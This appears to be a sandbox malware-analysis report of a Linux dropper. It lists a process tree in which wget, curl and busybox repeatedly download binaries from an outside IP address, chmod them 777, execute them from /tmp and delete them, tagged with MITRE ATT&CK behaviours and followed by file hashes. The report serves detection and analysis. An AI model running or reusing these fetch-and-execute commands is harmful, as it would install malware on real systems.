/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:925
-
-
/bin/chmodchmod 777 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20./1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:928
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:929
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:931
-
-
/bin/chmodchmod 777 13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll./13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:933
-
-
/bin/rmrm 13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:934
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵PID:935
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵PID:937
-
-
/bin/chmodchmod 777 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB./0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵PID:940
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:941
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:943
-
-
/bin/chmodchmod 777 Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE./Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:946
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:947
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:949
-
-
/bin/chmodchmod 777 EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd./EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:952
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:953
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:955
-
-
/bin/chmodchmod 777 NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi./NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:958
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:959
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:961
-
-
/bin/chmodchmod 777 v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA./v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:964
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:965
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:967
-
-
/bin/chmodchmod 777 xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz./xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:970
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:971
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:973
-
-
/bin/chmodchmod 777 MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU./MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:976
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:977
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:979
-
-
/bin/chmodchmod 777 QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1./QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:982
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97